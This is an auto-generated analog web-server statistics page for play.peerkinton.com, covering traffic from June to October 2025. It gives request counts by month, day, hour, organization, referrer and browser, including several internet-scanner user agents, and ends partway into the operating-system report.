Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for play.peerkinton.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://play.peerkinton.com/">play.peerkinton.com</a></h1> <p class="analysisspan">Program started on Fri, Oct 31 2025 at 12:03 PM. <br />Analyzed requests from Sat, Jun 21 2025 at 7:24 PM to Fri, Oct 31 2025 at 11:38 AM (131.68 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Oct 31 2025 at 12:03 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 292 (16) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (2) <br /><span class="gensumtitle">Successful requests for pages:</span> 178 (8) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (1) <br /><span class="gensumtitle">Failed requests:</span> 293 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 26 (189) <br /><span class="gensumtitle">Distinct hosts served:</span> 148 (174) <br /><span class="gensumtitle">Data transferred:</span> 261.77 kilobytes (17.96 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.99 kilobytes (2.57 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2025</td><td class="R">73</td><td class="P">36</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">36</td><td class="P">32</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">59</td><td class="P">36</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">28</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Oct 2025</td><td class="R">96</td><td class="P">52</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Oct 2025 (52 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">28</td><td class="P">26</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">16</td><td class="P">8</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Tue</td><td class="R">50</td><td class="P">33</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">24</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">Thu</td><td class="R">50</td><td class="P">25</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">31</td><td class="P">21</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">93</td><td class="P">50</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">14</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">18</td><td class="P">14</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">20</td><td class="P">18</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 4</td><td class="R">5</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">10</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">21</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">19</td><td class="P">14</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">16</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">17</td><td class="R">6</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">18</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">89</td><td class="P">30</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">24</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">22</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">23</td><td class="R">10</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">292</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">60</td><td class="b">22.47%</td><td class="xl">205.169</td></tr> <tr><td class="R">50</td><td class="b">16.77%</td><td class="xl">34</td></tr> <tr><td class="R">15</td><td class="b"> 8.80%</td><td class="xl">3</td></tr> <tr><td class="R">13</td><td class="b"> 4.41%</td><td class="xl">35</td></tr> <tr><td class="R">10</td><td class="b"> 3.72%</td><td class="xl">54</td></tr> <tr><td class="R">10</td><td class="b"> 2.35%</td><td class="xl">167.94</td></tr> <tr><td class="R">10</td><td class="b"> 2.40%</td><td class="xl">206.168</td></tr> <tr><td class="R">9</td><td class="b"> 2.80%</td><td class="xl">123</td></tr> <tr><td class="R">7</td><td class="b"> 2.68%</td><td class="xl">157.230</td></tr> <tr><td class="R">6</td><td class="b"> 1.95%</td><td class="xl">27</td></tr> <tr><td class="R">5</td><td class="b"> 2.40%</td><td class="xl">198.235</td></tr> <tr><td class="R">5</td><td class="b"> 2.44%</td><td class="xl">205.210</td></tr> <tr><td class="R">4</td><td class="b"> 1.46%</td><td class="xl">185.177</td></tr> <tr><td class="R">4</td><td class="b"> 1.51%</td><td class="xl">95</td></tr> <tr><td class="R">4</td><td class="b"> 1.02%</td><td class="xl">66.132</td></tr> <tr><td class="R">4</td><td class="b"> 0.10%</td><td class="xl">194.87</td></tr> <tr><td class="R">4</td><td class="b"> 0.52%</td><td class="xl">44</td></tr> <tr><td class="R">4</td><td class="b"> 2.05%</td><td class="xl">2</td></tr> <tr><td class="R">3</td><td class="b"> 0.76%</td><td class="xl">183.134</td></tr> <tr><td class="R">3</td><td class="b"> 0.10%</td><td class="xl">18</td></tr> <tr><td class="R">62</td><td class="b">19.29%</td><td class="xl">[not listed: 36 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">17</td><td class="xl"><a href="http://www.play.peerkinton.com/">http://www.play.peerkinton.com/</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">66</td><td class="xl">http://www.play.peerkinton.com/</td></tr> <tr><td class="R">8</td><td class="xl">http://play.peerkinton.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">28</td><td class="P">28</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">15</td><td class="P">15</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">10</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">9</td><td class="P">7</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">30</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">12</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">python-httpx/0.28.1</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27</td></tr> <tr><td class="R">19</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">163</td><td class="P">76</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">148</td><td class="P">61</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">13</td><td class="P">13</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Safari/601</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Safari/605</td></tr> <tr><td class="N">2</td><td class="R">64</td><td class="P">49</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">22</td><td class="P">20</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">8</td><td class="xl"> Firefox/47</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/126</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/29</td></tr> <tr><td class="N">4</td><td class="R">7</td><td class="P">7</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">7</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">5</td><td class="R">9</td><td class="P">7</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">7</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla</td></tr> <tr><td class="N">7</td><td class="R">5</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">8</td><td class="R">1</td><td class="P">1</td><td class="xl">Dalvik</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Dalvik/2</td></tr> <tr><td class="N"> </td><td class="R">4</td><td class="P">0</td><td class="xl">[not listed: 1 browser]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General 